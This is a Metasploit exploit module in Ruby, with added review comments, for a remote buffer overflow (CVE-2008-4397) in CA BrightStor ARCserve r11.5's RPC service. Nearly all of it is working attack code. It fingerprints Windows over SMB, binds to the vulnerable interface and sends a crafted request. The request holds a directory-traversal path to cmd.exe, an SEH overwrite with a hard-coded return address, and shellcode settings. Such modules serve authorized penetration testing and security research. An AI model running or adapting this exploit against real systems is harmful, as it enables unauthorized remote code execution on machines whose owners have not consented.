##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
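# Remote SEH overwrite in the ARCserve RPC service (opnum REPORTREMOTEEXECUTECML).
#
# Flow: fingerprint the OS over SMB (to pick the system directory name and the
# SEH offset), then bind to the ARCserve interface on RPORT and send one
# oversized request. The target's NetBIOS hostname (HNAME) is the first field
# of that request and must be supplied by the operator.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Exploit::Remote::Seh

  # Default RPORT: the port the ARCserve RPC service is expected on.
  ARCSERVE_RPORT = 6504
  # Port used for the SMB OS fingerprint; RPORT is pointed here only for the
  # duration of #fingerprint.
  SMB_FINGERPRINT_PORT = 445
  # Interface UUID of the vulnerable ARCserve RPC service.
  ARCSERVE_UUID = '506b1890-14c8-11d1-bbc3-00805fa6962e'
  # Opnum passed to dcerpc_call. NOTE(review): the Description says "opcode
  # 0x342" while this literal is decimal 342 (0x156). The decimal value is what
  # the module has always sent, so it is kept -- confirm against the advisory.
  VULN_OPNUM = 342

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in Computer Associates BrightStor ARCserve r11.5 (build 3884).
          By sending a specially crafted RPC request to opcode 0x342, an attacker could overflow the buffer
          and execute arbitrary code. In order to successfully exploit this vulnerability, you will need
          set the hostname argument (HNAME).
        },
        'Author' => [ 'Nahuel Cayento Riva', 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'BID', '31684' ],
          [ 'OSVDB', '49468' ],
          [ 'CVE', '2008-4397' ],
          [ 'URL', 'http://crackinglandia.blogspot.com/2009/10/el-colador-de-ca-computer-associates.html' ],
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          'Space' => 550,
          # Forbidden bytes: NUL, LF, CR, backslash, underscore, slash, dot --
          # presumably because the payload travels inside a path-like NDR string
          # (see #build_request); confirm before widening the set.
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
          # x86 `add esp, -0x1001 ; inc esp`: moves ESP away from the payload
          # before the decoder stub starts writing to the stack.
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
        },
        'Platform' => 'win',
        'Targets' => [
          # 'Ret' is the address written over the SEH handler by
          # generate_seh_payload; it is version-specific to ASCORE.dll.
          [ 'Computer Associates BrightStor ARCserve r11.5 (build 3884)', { 'Ret' => 0x2123bdf4 } ], # ASCORE.dll 11.5.3884.0
        ],
        'DisclosureDate' => '2008-10-09',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('HNAME', [ true, 'The NetBios hostname of the target.']),
        Opt::RPORT(ARCSERVE_RPORT)
      ]
    )
  end

  # Fingerprints the target OS over SMB.
  #
  # The SMB client mixin reads its port from the datastore, so RPORT is pointed
  # at 445 for the call and restored afterwards. The restore runs in +ensure+
  # so the operator's RPORT survives a failed fingerprint and an early return
  # from #exploit (previously the datastore was left at 445 in those cases and
  # a custom RPORT was silently replaced by the hard-coded 6504).
  #
  # @return [Hash] result of smb_fingerprint; #exploit reads its 'os' key
  def fingerprint
    saved_rport = datastore['RPORT']
    datastore['RPORT'] = SMB_FINGERPRINT_PORT
    begin
      smb_fingerprint
    ensure
      datastore['RPORT'] = saved_rport
    end
  end

  # Identifies the OS, then binds to the ARCserve interface on RPORT and sends
  # the overflowing request. Non-Windows fingerprints abort with an error.
  #
  # @return [void]
  def exploit
    os = fingerprint['os']

    # Windows 2000 keeps its system directory under WINNT and needs a different
    # amount of filler before the SEH record than later versions.
    case os
    when /Windows 2000/
      dir = 'winnt'
      offset = 442
    when /Windows/
      dir = 'windows'
      offset = 436
    else
      print_error('Target not supported!')
      return
    end

    print_status("Identified OS '#{os}', setting appropiate system path...")

    connect

    handle = dcerpc_handle(ARCSERVE_UUID, '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    request = build_request(dir, offset)

    print_status("Trying target #{target.name}...")

    begin
      dcerpc_call(VULN_OPNUM, request)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
      # Expected: the service usually stops answering once the overflow fires,
      # so a missing reply is not treated as a failure.
    end

    handler
    disconnect
  end

  # Builds the NDR-encoded REPORTREMOTEEXECUTECML request body.
  #
  # Field order: HNAME (upper-cased), a path that walks up out of the install
  # directory to cmd.exe in the system directory (ending in `cmd /c ""`), the
  # overflow string (+offset+ bytes of filler followed by the SEH record and
  # payload), then trailing strings/longs carried over from the original
  # proof-of-concept whose meaning is not documented here.
  #
  # @param dir [String] system directory name ('winnt' or 'windows')
  # @param offset [Integer] bytes of filler before the SEH record
  # @return [String] request body for dcerpc_call
  def build_request(dir, offset)
    overflow = rand_text_alpha_upper(offset) + generate_seh_payload(target.ret)

    request = NDR.string(datastore['HNAME'].upcase)
    request << NDR.string("..\\..\\..\\..\\..\\..\\..\\..\\..\\#{dir}\\system32\\cmd /c \"\"")
    request << NDR.string(overflow)
    request << NDR.string(rand_text_alpha_upper(20))
    request << NDR.long(2)
    request << NDR.long(2)
    request << NDR.string(rand_text_alpha_upper(20))
    request << NDR.long(0)
    request << NDR.long(4)
    request
  end
end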